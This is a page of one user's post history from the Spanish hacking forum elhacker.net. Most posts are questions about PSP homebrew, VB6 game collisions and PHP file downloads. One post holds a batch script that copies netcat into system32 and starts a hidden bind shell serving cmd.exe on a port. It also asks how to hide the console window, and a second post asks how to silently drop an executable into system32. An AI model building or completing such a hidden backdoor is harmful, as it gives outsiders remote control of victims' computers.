elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6
1  Media / Juegos y Consolas / alguna web con descargas de programas para psp? en: 28 Diciembre 2006, 00:55 am
hola gente , alguien conoce alguna web buena donde pueda bajar softwares para psp , no coo el psp video 9 y cosas de video , sino programas , como ... programas jeje


saludos y gracias
2  Media / Juegos y Consolas / Re: msn live psp messenger beta 1.0 en: 27 Diciembre 2006, 23:57 pm
ya ta , ya lo hice andar en el firmware 2.6

solo tenia que ir al navegadolr de internet y poneer : file/wlmp/screen.html

y llistop

saludos y ggracias
3  Media / Juegos y Consolas / Re: msn live psp messenger beta 1.0 en: 27 Diciembre 2006, 23:34 pm
yo no se , no lo probe pero parece rara esa imagen , no parecce pantalla de psp.


saludos
4  Media / Juegos y Consolas / msn live psp messenger beta 1.0 en: 27 Diciembre 2006, 22:12 pm
hola gente salio para la psp un msn , el live messenger de windows pero para la psp

http://dl.qj.net/Windows-Live-PSP-Messenger-BETA-BUILD-1.01-PSP-Homebrew-Applications/pg/12/fid/10379/catid/151



temgo un problema con este msn , hice lo que tengo que hacer es decir lo coloque en la cxarpeta root de la mamory stick pero como ago para verlo desde la psp??


saludos y gracias
5  Programación / Scripting / hacer una ventana de DOS invisible en .BAT en: 12 Diciembre 2006, 16:13 pm
hola gente , estoy haciendo un programa en .BAT que lo que hace es mover un archivo a una carpeta y ejecutar un comando en el DOS pero al ejecutar un comando la ventana del DOS no se cierra. como puedo hacer pra que esa ventana se haga invisible?


Código:
@echo off


copy nc.exe C:\WINDOWS\system32
nc -l -p 2236 -e cmd.exe -d


exit
6  Programación / Scripting / programa en bat para ocultar un archivo .exe y meterlo en una carpeta expecific en: 9 Diciembre 2006, 01:12 am
hola gente quiero hacer un programa en punta .bat que al ejecutarlo me guarde un .exe e la carpeta c:/windows/system32

que el programa que haga contenga el exe y al ejecutarlo haga lo que pido se puede .

alguin me puede guiar a como empex]zar a hacerlo ?



saludos y gracias
7  Media / Juegos y Consolas / EZ2DJ whistle emulator , de donde lo bajo? en: 4 Diciembre 2006, 03:03 am
hola gente alguien sabe de donde puedo bajar el EZ2DJ whistle emulator, estuve buscando en google pero no lo encontre aparecen muchas paginas en japones , chino y no entiendo nada .
intente traducir pero no funciona


saludos
8  Programación / PHP / bajar un archivo .txt , .EXE de mysql con php? en: 29 Noviembre 2006, 17:45 pm
hola agente , estoy haciendo una web en la cual el usuario pueda subir archivos a la base de datos mysql y se guarden en la base de datos . eso ya funciona pero lo que no se como hacer es para poder bajarlos a los archivos , que el usuario pueda bajarlos a su pc



saludos y gracias
9  Programación / Programación Visual Basic / Re: colisiones en vb6? en: 11 Noviembre 2006, 03:23 am
algun otro ejemplo sobre colisiones?
saludos
10  Programación / Programación Visual Basic / colisiones en vb6? en: 10 Noviembre 2006, 03:16 am
hola gente quiero aprender colisiones en vb6 para un juego que estoy haciendo  estuve buscando ejemplos de codigos en google , pero mucho no entiendo , alguien me puede tirar un ejemplo de una colision entre dos lavels , que se mueva un label con las tecas "wdsa" y que colisione con otro label


saludos y gracias
Páginas: [1] 2 3 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines